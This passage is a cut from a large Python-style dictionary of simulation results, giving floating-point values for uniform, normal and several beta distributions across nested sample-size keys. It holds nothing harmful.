0.13200511669657544, 'beta1': 0.077898151231101, 'beta2': 0.13654271371225812, 'beta4': 0.0637511735240166}, 200: {'uni': 0.09475898024659712, 'nor': 0.14327147451372735, 'beta1': 0.09501686919706781, 'beta2': 0.14759803188477688, 'beta4': 0.07871855013071921}, 150: {'uni': 0.10925599343816059, 'nor': 0.15297899030445272, 'beta1': 0.11015254323591961, 'beta2': 0.15768755238961485, 'beta4': 0.09295209765219048}, 100: {'uni': 0.13396368251923452, 'nor': 0.17179721647955526, 'beta1': 0.13345037859887932, 'beta2': 0.17765805845455007, 'beta4': 0.11642943784237603}, 75: {'uni': 0.15477736670546938, 'nor': 0.18895714897457644, 'beta1': 0.1539493080965768, 'beta2': 0.19447171707960897, 'beta4': 0.13724563488543373}, 50: {'uni': 0.18839002568598873, 'nor': 0.2180305171258889, 'beta1': 0.18831553334906875, 'beta2': 0.22129833914948438, 'beta4': 0.17275056471332206}, 30: {'uni': 0.24008961544263907, 'nor': 0.2650822786621322, 'beta1': 0.24252815499954994, 'beta2': 0.2688272811098853, 'beta4': 0.22663105019759328}, 20: {'uni': 0.2921433063597944, 'nor': 0.3141023199173227, 'beta1': 0.29340687139823474, 'beta2': 0.31266965958300064, 'beta4': 0.2804024303421781}, 10: {'uni': 0.41107290577052813, 'nor': 0.4263383340359735, 'beta1': 0.40828688918554545, 'beta2': 0.4250783970409252, 'beta4': 0.3988900709580016}}, 50: {1000: {'uni': 0.045319055803388075, 'nor': 0.13372164617361332, 'beta1': 0.042622363121129214, 'beta2': 0.13054115789301413, 'beta4': 0.03301256635793812}, 750: {'uni': 0.05163228099424677, 'nor': 0.1349664254862753, 'beta1': 0.0496423021703164, 'beta2': 0.13446750687108505, 'beta4': 0.0385279485772233}, 500: {'uni': 0.061439306229550794, 'nor': 0.14055103421779302, 'beta1': 0.060142216296224515, 'beta2': 0.13752593042865568, 'beta4': 0.04724339812053602}, 400: {'uni': 0.0693663795699413, 'nor': 0.14556747938193393, 'beta1': 0.06738356899478581, 'beta2': 0.14143610440720644, 'beta4': 0.053576307903667963}, 300: {'uni': 0.07864177620663654, 'nor': 0.15022792976856758, 'beta1': 0.07821473255565609, 'beta2': 0.1478580791021359, 'beta4': 0.06262935931375649}, 200: {'uni': 0.0953862720353692, 'nor': 0.1622200125881057, 'beta1': 0.09603404932034854, 'beta2': 0.15816299759409325, 'beta4': 0.0773943582431677}, 150: {'uni': 0.11002583704405877, 'nor': 0.17113991351179697, 'beta1': 0.10936894301480282, 'beta2': 0.1687178421219161, 'beta4': 0.09028525692400177}, 100: {'uni': 0.13401450754618016, 'nor': 0.1895698802210114, 'beta1': 0.1344582332361554, 'beta2': 0.18419709322450312, 'beta4': 0.11379130616549382}, 75: {'uni': 0.15488258558714707, 'nor': 0.20362572995006806, 'beta1': 0.1539002041533405, 'beta2': 0.20128361931559535, 'beta4': 0.1333671945439988}, 50: {'uni': 0.18840791165484855, 'nor': 0.23257306685125415, 'beta1': 0.18867436580219135, 'beta2': 0.22835957658151024, 'beta4': 0.16757432345808926}, 30: {'uni': 0.24023168620563118, 'nor': 0.27904847253128273, 'beta1': 0.24006751123167158, 'beta2': 0.2727595659081496, 'beta4': 0.22275659673727644}, 20: {'uni': 0.2940018318983334, 'nor': 0.32479532584592363, 'beta1': 0.2929946618763485, 'beta2': 0.3206467179138732, 'beta4': 0.2753491673001646}, 10: {'uni': 0.4065488810708842, 'nor': 0.43093738566136636, 'beta1': 0.4064636440527985, 'beta2': 0.42567627450176926, 'beta4': 0.3935956418408144}}, 30: {1000: {'uni': 0.04968157954456354, 'nor': 0.1696151004367587, 'beta1': 0.04281863132067795, 'beta2': 0.14689302839678564, 'beta4': 0.03311442937738629}, 750: {'uni': 0.055574487451747534, 'nor': 0.17246364021137395, 'beta1': 0.04952430388104273, 'beta2': 0.15046099536657231, 'beta4': 0.038285428923678255}, 500: {'uni': 0.06478088254077552, 'nor': 0.1737409366264756, 'beta1': 0.0602313802132467, 'beta2': 0.15517477082552145, 'beta4': 0.047192612626946184}, 400: {'uni': 0.07143398822894637, 'nor': 0.1789456292964713, 'beta1': 0.06778902728856115, 'beta2': 0.15742066713207048, 'beta4': 0.05282205994257394}, 300: {'uni': 0.08082785446492691, 'nor': 0.1824810151126436, 'beta1': 0.07787606767722169, 'beta2': 0.16276174102685503, 'beta4': 0.06159728641016676}, 200: {'uni': 0.0974108225516378, 'nor': 0.19235380984611056, 'beta1': 0.09543113477422605, 'beta2': 0.17283803046058355, 'beta4': 0.07550424392452293}, 150: {'uni': 0.11141405928139247, 'nor': 0.20191035833451154, 'beta1': 0.10938230867137078, 'beta2': 0.1820889616226289, 'beta4': 0.08762848356724207}, 100: {'uni': 0.13493046831910993, 'nor': 0.21701554067653117, 'beta1': 0.13386778798076912, 'beta2': 0.19508747959897582, 'beta4': 0.11093409043298663}, 75: {'uni': 0.15528958618348487, 'nor': 0.2299457189815397, 'beta1': 0.15409095027566755, 'beta2': 0.2109482892562924, 'beta4': 0.12881215324966622}, 50: {'uni': 0.18842291872138123, 'nor': 0.2584487077125532, 'beta1': 0.18890320722823578, 'beta2': 0.23827797918175672, 'beta4': 0.16158273294453834}, 30: {'uni': 0.2398366149463353, 'nor': 0.2980088771871361, 'beta1': 0.24200577319830247, 'beta2': 0.28238021073320035, 'beta4': 0.21498111468517844}, 20: {'uni': 0.29227132801590716, 'nor': 0.34432255002709555, 'beta1': 0.2914850392665248, 'beta2': 0.32585452654798963, 'beta4': 0.2669285712544458}, 10: {'uni': 0.40609305573179105, 'nor': 0.447820015199636, 'beta1': 0.40782948526995666, 'beta2': 0.42757111844224754, 'beta4': 0.3886693622267199}}, 20: {1000: {'uni': 0.05775001007007219, 'nor': 0.20319134519921084, 'beta1': 0.048129745899927925, 'beta2': 0.1658497799626829, 'beta4': 0.0329367295696176}, 750: {'uni': 0.062124231199756075, 'nor': 0.20860283378380778, 'beta1': 0.04983248111631, 'beta2': 0.16830562563830098, 'beta4': 0.03824865513096315}, 500: {'uni': 0.0705024643008979, 'nor': 0.21381602181117743, 'beta1': 0.06065658795610929, 'beta2': 0.17239927975361702, 'beta4': 0.04679865268868699}, 400: {'uni': 0.0761771420430718, 'nor': 0.21385203271203002, 'beta1': 0.06752239679804717, 'beta2': 0.17470111438116842, 'beta4': 0.05231551861903025}, 300: {'uni': 0.08596884925259118, 'nor': 0.21991598100008408, 'beta1': 0.07755871126605102, 'beta2': 0.179198373732674, 'beta4': 0.06068391139230339}, 200: {'uni': 0.10080581963801893, 'nor': 0.22897240194696655, 'beta1': 0.09573721958215525, 'beta2': 0.18553633863631513, 'beta4': 0.07462617121595846}, 150: {'uni': 0.114468804467043, 'nor': 0.23631664987390277, 'beta1': 0.10962036209737869, 'beta2': 0.1966018010006519, 'beta4': 0.0870041079920092}, 100: {'uni': 0.13665630970632198, 'nor': 0.2515883777222933, 'beta1': 0.1336228418007765, 'beta2': 0.20881550687413342, 'beta4': 0.10773682421715106}, 75: {'uni': 0.15695962977063316, 'nor': 0.2603016829084427, 'beta1': 0.15508110679604847, 'beta2': 0.22376688776132403, 'beta4': 0.125626481557148}, 50: {'uni': 0.18798876388799624, 'nor': 0.2849538127709019, 'beta1': 0.18882535166765735, 'beta2': 0.24974430328165448, 'beta4': 0.158008406145491}, 30: {'uni': 0.23998853919104884, 'nor': 0.3219977260938881, 'beta1': 0.24135680518002922, 'beta2': 0.2899857898675655, 'beta4': 0.20763359812674523}, 20: {'uni': 0.292373057732106, 'nor': 0.3655787731698917, 'beta1': 0.2924979299262157, 'beta2': 0.3319078417717419, 'beta4': 0.2608606590647614}, 10: {'uni': 0.4061016266543868, 'nor': 0.4671521171088977, 'beta1': 0.4096525764106935, 'beta2': 0.4345673196704135, 'beta4': 0.37937846970295347}}, 10: {1000: {'uni': 0.0913473264369822, 'nor': 0.2964728394162681, 'beta1': 0.09100152658005456, 'beta2': 0.20242925737599682, 'beta4': 0.032700600789628664}, 750: {'uni': 0.09326085272482565, 'nor': 0.29554795490186203, 'beta1': 0.09103352579316204, 'beta2': 0.20619044529626096, 'beta4': 0.037829259115970404}, 500: {'uni': 0.0971331647876415, 'nor': 0.30097993907808684, 'beta1': 0.091049904849404, 'beta2': 0.20699779845573962, 'beta4': 0.04650399550454862}, 400: {'uni': 0.1003597113284248, 'nor': 0.30233932585089107, 'beta1': 0.09107096529100855, 'beta2': 0.20830655812948695, 'beta4': 0.051895391977686056}, 300: {'uni': 0.10721764330695623, 'nor': 0.3073271090395088, 'beta1': 0.09112836953131596, 'beta2': 0.21402715597956734, 'beta4': 0.06001640083268511}, 200: {'uni': 0.11805616667496477, 'nor': 0.3147831503605935, 'beta1': 0.09648796317997815, 'beta2': 0.22109533500255907, 'beta4': 0.07370742701518179}, 150: {'uni': 0.12810610943312417, 'nor': 0.32062575553585454, 'beta1': 0.1103702654857096, 'beta2': 0.22691351867751697, 'beta4': 0.08545929847308015}, 100: {'uni': 0.14756617194854993, 'nor': 0.33197543815379127, 'beta1': 0.135132358543155, 'beta2': 0.23880036275598282, 'beta4': 0.1050005710193368}, 75: {'uni': 0.1661626166131514, 'nor': 0.34126609250236845, 'beta1': 0.15438638517404316, 'beta2': 0.2499089973779972, 'beta4': 0.12149147312793035}, 50: {'uni': 0.19583204530592255, 'nor': 0.3545594670011578, 'beta1': 0.18672230934909217, 'beta2': 0.2730457458179122, 'beta4': 0.1512119547385279}, 30: {'uni': 0.2435600610386478, 'nor': 0.39653189875476424, 'beta1': 0.2404639573254724, 'beta2': 0.3066180700113161, 'beta4': 0.19739374662116618}, 20: {'uni': 0.2932263659568272, 'nor': 0.4283833265615067, 'beta1': 0.29077513214843564, 'beta2': 0.3504847489217736, 'beta4': 0.24789858189847203}, 10: {'uni': 0.4059510050471383, 'nor': 0.51847323520602, 'beta1': 0.40531924075862663, 'beta2': 0.442169996022317, 'beta4': 0.3597039082336214}}}, 0.1: {1000: {1000: {'uni': 0.03865579099473948, 'nor': 0.04689323213481217, 'beta1': 0.03864443104847837, 'beta2': 0.06928001273732087, 'beta4': 0.034746385826709525}, 750: {'uni': 0.04431178998702129, 'nor': 0.05154757047623354, 'beta1': 0.04471651202934612, 'beta2': 0.07068001177091865, 'beta4': 0.04061642187839365}, 500: {'uni': 0.05449621343988875, 'nor': 0.06052185385730591, 'beta1': 0.054284378799021704, 'beta2': 0.07627185785494306, 'beta4': 0.05066709479143283}, 400: {'uni': 0.06094293297893738, 'nor': 0.06655379885026683, 'beta1': 0.06063207438253193, 'beta2': 0.0805230789692084, 'beta4': 0.057268551423413916}, 300: {'uni': 0.07035612682535114, 'nor': 0.07484946592814268, 'beta1': 0.07012629576924828, 'beta2': 0.08695683101854024, 'beta4': 0.06723411467423446}, 200: {'uni': 0.0856850266615582, 'nor': 0.08920392339205196, 'beta1': 0.08598961798425064, 'beta2': 0.09957077044100182, 'beta4': 0.0828676651996616}, 150: {'uni': 0.09851344951124391, 'nor': 0.10245978909640735, 'beta1': 0.09874089203017197, 'beta2': 0.11143243172461781, 'beta4': 0.09626599766980459}, 100: {'uni': 0.1210111549309712, 'nor': 0.12298171658155477, 'beta1': 0.12043414875564495, 'beta2': 0.1308096653595, 'beta4': 0.11838570937570658}, 75: {'uni': 0.13938671579559747, 'nor': 0.14217000359022663, 'beta1': 0.138725193479173, 'beta2': 0.1471890814905698, 'beta4': 0.1371285598122392}, 50: {'uni': 0.16966268801360024, 'nor': 0.17032733000500144, 'beta1': 0.16965634639647975, 'beta2': 0.17659318599354473, 'beta4': 0.16779361043827323}, 30: {'uni': 0.21937716053448017, 'nor': 0.2191535761895615, 'beta1': 0.21730939148151623, 'beta2': 0.22312364454880895, 'beta4': 0.21786573953931154}, 20: {'uni': 0.26624534959584256, 'nor': 0.2653268175644278, 'beta1': 0.26474433641392037, 'beta2': 0.26812009306025597, 'beta4': 0.26194067601195037}, 10: {'uni': 0.36801398201907515, 'nor': 0.3709069141739802, 'beta1': 0.3668592370274731, 'beta2': 0.37064040545123844, 'beta4': 0.36704323242150666}}, 750: {1000: {'uni': 0.038578042981164296, 'nor': 0.048914303251900604, 'beta1': 0.03853302192863617, 'beta2': 0.0688056514749229, 'beta4': 0.0338622699562493}, 750: {'uni': 0.04442141557686974, 'nor': 0.05374944654503383, 'beta1': 0.044374748815966814, 'beta2': 0.07026684762315227, 'beta4': 0.03979048728222595}, 500: {'uni': 0.054286956718598955, 'nor': 0.06212763227553719, 'beta1': 0.054253588244283946, 'beta2': 0.07656236068086564, 'beta4': 0.049939942721689445}, 400: {'uni': 0.06083366825985448, 'nor': 0.06788419585350336, 'beta1': 0.060660028681503775, 'beta2': 0.08068669745769219, 'beta4': 0.05675736877098636}, 300: {'uni': 0.06993166265169576, 'nor': 0.07680384961751496, 'beta1': 0.07010161417489508, 'beta2': 0.0880572291137307, 'beta4': 0.06596363343773998}, 200: {'uni': 0.0851211251657536, 'nor': 0.09099559217968667, 'beta1': 0.08536971610728128, 'beta2': 0.10062359974481189, 'beta4': 0.08250279408907268}, 150: {'uni': 0.09831231905867402, 'nor': 0.10383736756173939, 'beta1': 0.09899967339806359, 'beta2': 0.11139402129433418, 'beta4': 0.09586157739072232}, 100: {'uni': 0.12095357943723123, 'nor': 0.12436567324838821, 'beta1': 0.12052591808871516, 'beta2': 0.13100845891806429, 'beta4': 0.11773670273834078}, 75: {'uni': 0.13940484887133242, 'nor': 0.14155145908354727, 'beta1': 0.13837916177477272, 'beta2': 0.14796493865747803, 'beta4': 0.13654473331430828}, 50: {'uni': 0.16894951238844866, 'nor': 0.17265459646884784, 'beta1': 0.16961105932607348, 'beta2': 0.17656490288692311, 'beta4': 0.1674972244617925}, 30: {'uni': 0.21651765294813125, 'nor': 0.21939168771962442, 'beta1': 0.21729204037445293, 'beta2': 0.22349957660235154, 'beta4': 0.21623428560039515}, 20: {'uni': 0.2642786935555307, 'nor': 0.2675799785148938, 'beta1': 0.26561099996019183, 'beta2': 0.2691253631613714, 'beta4': 0.2645344136768742}, 10: {'uni': 0.3695291099836718, 'nor': 0.3711051681589676, 'beta1': 0.37110270903505804, 'beta2': 0.3730098056299037, 'beta4': 0.3662152768074211}}, 500: {1000: {'uni': 0.03836341807194299, 'nor': 0.05288441357758422, 'beta1': 0.03855355377252884, 'beta2': 0.07246101460269183, 'beta4': 0.03331891444897561}, 750: {'uni': 0.0444146556451972, 'nor': 0.05765382477238595, 'beta1': 0.04441014342661165, 'beta2': 0.07465473765203068, 'beta4': 0.03861388373348723}, 500: {'uni': 0.05438833618427541, 'nor': 0.06550856448266529, 'beta1': 0.05429312306612194, 'beta2': 0.08110283704211807, 'beta4': 0.048644471904955966}, 400: {'uni': 0.06077670141165842, 'nor': 0.07181845544231241, 'beta1': 0.06061997617710235, 'beta2': 0.08578519852772415, 'beta4': 0.05521030797490445}, 300: {'uni': 0.07041595748509133, 'nor': 0.07946505900730128, 'beta1': 0.0704016017009636, 'beta2': 0.09209979263017587, 'beta4': 0.06483174788141038}, 200: {'uni': 0.08563012945992199, 'nor': 0.0940723299141569, 'beta1': 0.08541074081441047, 'beta2': 0.10458447320510883, 'beta4': 0.08098282824897673}, 150: {'uni': 0.09899026948327977, 'nor': 0.10562357103466236, 'beta1': 0.09861292652287168, 'beta2': 0.11632528204922898, 'beta4': 0.0940489883300496}, 100: {'uni': 0.12076176494614121, 'nor': 0.1257258205330381, 'beta1': 0.12054780424559441, 'beta2': 0.13468669896864294, 'beta4': 0.11652043544137913}, 75: {'uni': 0.13920364976539873, 'nor': 0.1451998235260331, 'beta1': 0.13872567771909045, 'beta2': 0.15128300093267993, 'beta4': 0.13571279744636144}, 50: {'uni': 0.16954390111422946, 'nor': 0.172692463113301, 'beta1': 0.1693168682908624, 'beta2': 0.17976834049282708, 'beta4': 0.16609850304544527}, 30: {'uni': 0.21709640413871756, 'nor': 0.22184138531054348, 'beta1': 0.21757402187586894, 'beta2': 0.22444521991819788, 'beta4': 0.21392411551684015}, 20: {'uni': 0.2636520645162054, 'nor': 0.26652594436945887, 'beta1': 0.265223822071589, 'beta2': 0.2721218328512449, 'beta4': 0.2627686738338032}, 10: {'uni': 0.36726905749678107, 'nor': 0.3699346949326602, 'beta1': 0.36849489074859143, 'beta2': 0.3705089961045096, 'beta4': 0.3683244510638542}}, 400: {1000: {'uni': 0.038671955406556435, 'nor': 0.055340672020988524, 'beta1': 0.03839858850395489, 'beta2': 0.07292338725212977, 'beta4': 0.032563312918836074}, 750: {'uni': 0.04481109074042289, 'nor': 0.05989416561151395, 'beta1': 0.04447627902390899, 'beta2': 0.07495569974438154, 'beta4': 0.03825050788799533}, 500: {'uni': 0.05452739978724558, 'nor': 0.06844117462965149, 'beta1': 0.05427711866364415, 'beta2': 0.08075667657637409, 'beta4': 0.04799001758839683}, 400: {'uni': 0.0611511660781307, 'nor': 0.07331590982555752, 'beta1': 0.060592106128168455, 'beta2': 0.08541781550168484, 'beta4': 0.05429207860179752}, 300: {'uni': 0.07033185789840113, 'nor': 0.08155939051842442, 'beta1': 0.07020664995088899, 'beta2': 0.09207127639350217, 'beta4': 0.06368267547644724}, 200: {'uni': 0.08544638993146081, 'nor': 0.09571715041830708, 'beta1': 0.08570866106209285, 'beta2': 0.10630400769293069, 'beta4': 0.08024458505578957}, 150: {'uni': 0.09829333569563875, 'nor': 0.10653764892501733, 'beta1': 0.09928267092865872, 'beta2': 0.11707715788245693, 'beta4': 0.09396885720717318}, 100: {'uni': 0.12080421136273911, 'nor': 0.12821500349277992, 'beta1': 0.12103112779938607, 'beta2': 0.13533651452822992, 'beta4': 0.11606955631404037}, 75: {'uni': 0.13856046617279955, 'nor': 0.1448041375046114, 'beta1': 0.13960085219794205, 'beta2': 0.152159478857264, 'beta4': 0.13494084962417124}, 50: {'uni': 0.1693496286995576, 'nor': 0.17474469922632208, 'beta1': 0.16895412831719117, 'beta2': 0.17830731451150195, 'beta4': 0.1659480783288083}, 30: {'uni': 0.21819978784843835, 'nor': 0.2231518999196621, 'beta1': 0.21831546700467166, 'beta2': 0.2266742699981823, 'beta4': 0.21494937232251626}, 20: {'uni': 0.2667842124402274, 'nor': 0.2684191444539494, 'beta1': 0.2645995976816778, 'beta2': 0.27338561154866864, 'beta4': 0.26360661161857973}, 10: {'uni': 0.3669373614601618, 'nor': 0.37176690566406345, 'beta1': 0.3677474444699915, 'beta2': 0.3747266621010322, 'beta4': 0.3684049267602626}}, 300: {1000: {'uni': 0.038568146042191165, 'nor': 0.06033077287311639, 'beta1': 0.03858815015821093, 'beta2': 0.07552788266669708, 'beta4': 0.032200314601627644}, 750: {'uni': 0.04470027622900535, 'nor': 0.06449447691372501, 'beta1': 0.04445980130759988, 'beta2': 0.07824363987830985, 'beta4': 0.037629338463132156}, 500: {'uni': 0.05445235908316243, 'nor': 0.07219718892016075, 'beta1': 0.054262938865397015, 'beta2': 0.08422237701364471, 'beta4': 0.047142226840530044}, 400: {'uni': 0.06066467596958125, 'nor': 0.07755227668883014, 'beta1': 0.060492785543729444, 'beta2': 0.08820282905569876, 'beta4': 0.0537567311081823}, 300: {'uni': 0.06977557375995519, 'nor': 0.08485533637785325, 'beta1': 0.06951934425266007, 'beta2': 0.09812061998557053, 'beta4': 0.06253013614048619}, 200: {'uni': 0.085560824769008, 'nor': 0.09806835521037083, 'beta1': 0.08569790505589447, 'beta2': 0.10952789442497846, 'beta4': 0.07876260453935757}, 150: {'uni': 0.09861884343747088, 'nor': 0.10976436498857722, 'beta1': 0.09868041617950538, 'beta2': 0.11941996964693702, 'beta4': 0.09215823777804794}, 100: {'uni': 0.12082163981848504, 'nor': 0.12942192768323635, 'beta1': 0.12068117757143665, 'beta2': 0.1385783464518442, 'beta4': 0.11497977710795462}, 75: {'uni': 0.1387394671775295, 'nor': 0.14749930743714523, 'beta1': 0.13839845771793613, 'beta2': 0.15556474644945018, 'beta4': 0.13341435974554122}, 50: {'uni': 0.1697760858230185, 'nor': 0.17696687496485167, 'beta1': 0.17005727177394436, 'beta2': 0.18213762748458961, 'beta4': 0.16456011116133662}, 30: {'uni': 0.21841433839440783, 'nor': 0.22294642276220844, 'beta1': 0.21767910026340637, 'beta2': 0.2267095097296688, 'beta4': 0.21367190022853494}, 20: {'uni': 0.26434835889323316, 'nor': 0.2703508019917835, 'beta1': 0.2657962071894101, 'beta2': 0.27291680141430064, 'beta4': 0.2608999363528367}, 10: {'uni': 0.366851595427454, 'nor': 0.3698626345274391, 'beta1': 0.3671514175821456, 'beta2': 0.3737902254897134, 'beta4': 0.36667318670050814}}, 200: {1000: {'uni': 0.03854748922549689, 'nor': 0.06826609819066709, 'beta1': 0.038509650033551, 'beta2': 0.08137799639220133, 'beta4': 0.03162300254061415}, 750: {'uni': 0.04473955552343811, 'nor': 0.07200790785222766, 'beta1': 0.04438496783157364, 'beta2': 0.08407305489878691, 'beta4': 0.03667915924788884}, 500: {'uni': 0.054603748253756024, 'nor': 0.07895892719006692, 'beta1': 0.05455329073640525, 'beta2': 0.09050017429835211, 'beta4': 0.0460887620966024}, 400: {'uni': 0.06068150539987971, 'nor': 0.08357529343486114, 'beta1': 0.0607004483760466, 'beta2': 0.09547446895325118, 'beta4': 0.052385584132791485}, 300: {'uni': 0.06982758157167712, 'nor': 0.0910022478908723, 'beta1': 0.06999218391151302, 'beta2': 0.10311006289652225, 'beta4': 0.06142711299550374}, 200: {'uni': 0.0850781158120894, 'nor': 0.10365599068508824, 'beta1': 0.08590109771629173, 'beta2': 0.1149287508099453, 'beta4': 0.0770323488052646}, 150: {'uni': 0.0993944312574237, 'nor': 0.11435325767762983, 'beta1': 0.09924451816247526, 'beta2': 0.12522181631529639, 'beta4': 0.09022268035640774}, 100: {'uni': 0.1200373195770541, 'nor': 0.1336212549639687, 'beta1': 0.12101160493161028, 'beta2': 0.14360115025497422, 'beta4': 0.11282854715360996}, 75: {'uni': 0.13803069827511782, 'nor': 0.15135686336876558, 'beta1': 0.13969975342935437, 'beta2': 0.1581734543425124, 'beta4': 0.1311769883842281}, 50: {'uni': 0.17000076548600052, 'nor': 0.18005695698050672, 'beta1': 0.16957807122266255, 'beta2': 0.18526189089470024, 'beta4': 0.1623745159068773}, 30: {'uni': 0.2185664583080269, 'nor': 0.22568866441722213, 'beta1': 0.21591449849525435, 'beta2': 0.23093983759970643, 'beta4': 0.213118806872053}, 20: {'uni': 0.26291321552377933, 'nor': 0.27125311697510335, 'beta1': 0.265078403464129, 'beta2': 0.2748140209145749, 'beta4': 0.25847640298998725}, 10: {'uni': 0.3701815312790644, 'nor': 0.3735972474840512, 'beta1': 0.36772406840807353, 'beta2': 0.37422364182301204, 'beta4': 0.36496493955486975}}, 150: {1000: {'uni': 0.038671137731641714, 'nor': 0.07489217671007431, 'beta1': 0.038714599773274294, 'beta2': 0.08587393355161688, 'beta4': 0.031043016499080256}, 750: {'uni': 0.04433800928987097, 'nor': 0.07869757447476963, 'beta1': 0.04435075697917096, 'beta2': 0.0888959352720804, 'beta4': 0.0363140391204399}, 500: {'uni': 0.05430754404756716, 'nor': 0.08479608059147858, 'beta1': 0.05449721924927653, 'beta2': 0.09800285567074296, 'beta4': 0.04543347855755667}, 400: {'uni': 0.060705891345482654, 'nor': 0.08917510453779187, 'beta1': 0.060434538413570604, 'beta2': 0.10037917578431343, 'beta4': 0.051204096787690445}, 300: {'uni': 0.07049246163826528, 'nor': 0.09606124979171526, 'beta1': 0.07009292436806885, 'beta2': 0.1069080677782065, 'beta4': 0.05999502715904392}, 200: {'uni': 0.08586052698148705, 'nor': 0.10900056975883626, 'beta1': 0.08626264567064978, 'beta2': 0.11987083383282779, 'beta4': 0.07554909088250805}, 150: {'uni': 0.09875402367188635, 'nor': 0.11962698211682443, 'beta1': 0.09823214833546662, 'beta2': 0.12903038650506438, 'beta4': 0.08871159962248731}, 100: {'uni': 0.12052514898174571, 'nor': 0.13889683791136048, 'beta1': 0.12060529630888162, 'beta2': 0.14704712969881378, 'beta4': 0.11045343255041773}, 75: {'uni': 0.1384992792451861, 'nor': 0.15478420535093318, 'beta1': 0.13894749406062784, 'beta2': 0.1622177087017118, 'beta4': 0.12957103132509315}, 50: {'uni': 0.1696445420380115, 'nor': 0.1826703268000962, 'beta1': 0.16956250951500046, 'beta2': 0.18912522574118165, 'beta4': 0.16076304630746918}, 30: {'uni': 0.21708843420467044, 'nor': 0.22747076876879424, 'beta1': 0.2162197472621421, 'beta2': 0.23011438026305547, 'beta4': 0.21038257831299034}, 20: {'uni': 0.2635940728771885, 'nor': 0.27181622559884444, 'beta1': 0.2656550529386193, 'beta2': 0.27590232647329493, 'beta4': 0.2610592031194704}, 10: {'uni': 0.36957283113407985, 'nor': 0.3755749715318515, 'beta1': 0.3694332288882942, 'beta2': 0.3745828156724571, 'beta4': 0.362866754497916}}, 100: {1000: {'uni': 0.0391852789896201, 'nor': 0.08748278815593058, 'beta1': 0.03835204486107713, 'beta2': 0.09059314017831821, 'beta4': 0.030871329427173577}, 750: {'uni': 0.04487620054963998, 'nor': 0.09008413022094708, 'beta1': 0.044419301053983895, 'beta2': 0.0938143285125057, 'beta4': 0.035651375677830055}, 500: {'uni': 0.05445853301054582, 'nor': 0.09612181255635743, 'beta1': 0.05460984209093778, 'beta2': 0.10218771914762725, 'beta4': 0.04452799083539005}, 400: {'uni': 0.060889521772825805, 'nor': 0.10031899779947095, 'beta1': 0.060948683104371126, 'beta2': 0.10541070962786026, 'beta4': 0.05012038630616317}, 300: {'uni': 0.07005128941367278, 'nor': 0.10658935036183773, 'beta1': 0.07009895459384657, 'beta2': 0.11170488328681916, 'beta4': 0.05864521177984011}, 200: {'uni': 0.08540225344537783, 'nor': 0.11890199866834528, 'beta1': 0.08502320710520805, 'beta2': 0.12395353434803436, 'beta4': 0.07387574145690157}, 150: {'uni': 0.09885046476067078, 'nor': 0.12839494402381713, 'beta1': 0.09934985587864284, 'beta2': 0.13434579187022588, 'beta4': 0.08566408819803323}, 100: {'uni': 0.12047137314751694, 'nor': 0.14581363150714843, 'beta1': 0.12030434397784306, 'beta2': 0.1511774251514193, 'beta4': 0.10729772293868556}, 75: {'uni': 0.13900232220953807, 'nor': 0.16310365822781592, 'beta1': 0.13886677230092376, 'beta2': 0.16609733213725825, 'beta4': 0.12653611564166728}, 50: {'uni': 0.16926530053780198, 'nor': 0.1894194492417549, 'beta1': 0.1702780520534074, 'beta2': 0.19236637904828646, 'beta4': 0.1577775823414037}, 30: {'uni': 0.21805620163425476, 'nor': 0.23303141581452969, 'beta1': 0.21774239331391093, 'beta2': 0.23521808252559517, 'beta4': 0.20825701308967687}, 20: {'uni': 0.2643242332020047, 'nor': 0.27896279120794987, 'beta1': 0.2652844445947362, 'beta2': 0.27899677620691904, 'beta4': 0.2564356340644192}, 10: {'uni': 0.36868660537699743, 'nor': 0.3801425407117649, 'beta1': 0.3691995028759322, 'beta2': 0.37929775988096986, 'beta4': 0.3638553742502826}}, 75: {1000: {'uni': 0.03947518275469575, 'nor': 0.0972287182231617, 'beta1': 0.03864849717150598, 'beta2': 0.0952234254591443, 'beta4': 0.030504505239134838}, 750: {'uni': 0.04551965251101908, 'nor': 0.10116693467733584, 'beta1': 0.04443711038356635, 'beta2': 0.09869508499069957, 'beta4': 0.03555977512406705}, 500: {'uni': 0.05494057158528598, 'nor': 0.1057676067326096, 'beta1': 0.05445336207397927, 'beta2': 0.1055765017477942, 'beta4': 0.043998042119070546}, 400: {'uni': 0.060969026310390834, 'nor': 0.10945271980173626, 'beta1': 0.061077517258748326, 'beta2': 0.1099056389579467, 'beta4': 0.04942638750338929}, 300: {'uni': 0.07012941993226982, 'nor': 0.11595846348507075, 'beta1': 0.07039222027455194, 'beta2': 0.11738385669726281, 'beta4': 0.057678877694784}, 200: {'uni': 0.08638646649234194, 'nor': 0.126890208298988, 'beta1': 0.08609870986026835, 'beta2': 0.1293273654437882, 'beta4': 0.07214722508101312}, 150: {'uni': 0.09903143295834599, 'nor': 0.13569255431524507, 'beta1': 0.0986204644618468, 'beta2': 0.1383759438633969, 'beta4': 0.08472012631786002}, 100: {'uni': 0.12042784597491996, 'nor': 0.1538654219813379, 'beta1': 0.12047443267408167, 'beta2': 0.15479064845781504, 'beta4': 0.10572696956038574}, 75: {'uni': 0.13830413084922855, 'nor': 0.16929639027614796, 'beta1': 0.1387890089056115, 'beta2': 0.16973078116853618, 'beta4': 0.12418040490595178}, 50: {'uni': 0.16830423148890084, 'nor': 0.1942891319284309, 'beta1': 0.16984574641040717, 'beta2': 0.19571354576291627, 'beta4': 0.15658953127105207}, 30: {'uni': 0.21781307361797006, 'nor': 0.23824445270348382, 'beta1': 0.21900666049148654, 'beta2': 0.23923389502771286, 'beta4': 0.20443259848465625}, 20: {'uni': 0.2619095049476788, 'nor': 0.2830118442439754, 'beta1': 0.26563000767153383, 'beta2': 0.281971996905995, 'beta4': 0.25388919785330466}, 10: {'uni': 0.3685724124734001, 'nor': 0.38033611275896406, 'beta1': 0.3703883643155905, 'beta2': 0.3794242112561502, 'beta4': 0.3585528364829571}}, 50: {1000: {'uni': 0.04077866659121632, 'nor': 0.11580496049799294, 'beta1': 0.03853944253374597, 'beta2': 0.10586786875499299, 'beta4': 0.03023595571004084}, 750: {'uni': 0.04664929426958103, 'nor': 0.11784347998818245, 'beta1': 0.04458588264014807, 'beta2': 0.10969638470331955, 'beta4': 0.03498175243961467}, 500: {'uni': 0.05599120254346879, 'nor': 0.1227826762822789, 'beta1': 0.05467291714710451, 'beta2': 0.11556286804274307, 'beta4': 0.04331548807386715}, 400: {'uni': 0.0618059390475908, 'nor': 0.12716067908984624, 'beta1': 0.06076018571852698, 'beta2': 0.11944923182949141, 'beta4': 0.048733808094156394}, 300: {'uni': 0.07145474332507373, 'nor': 0.13215808532037732, 'beta1': 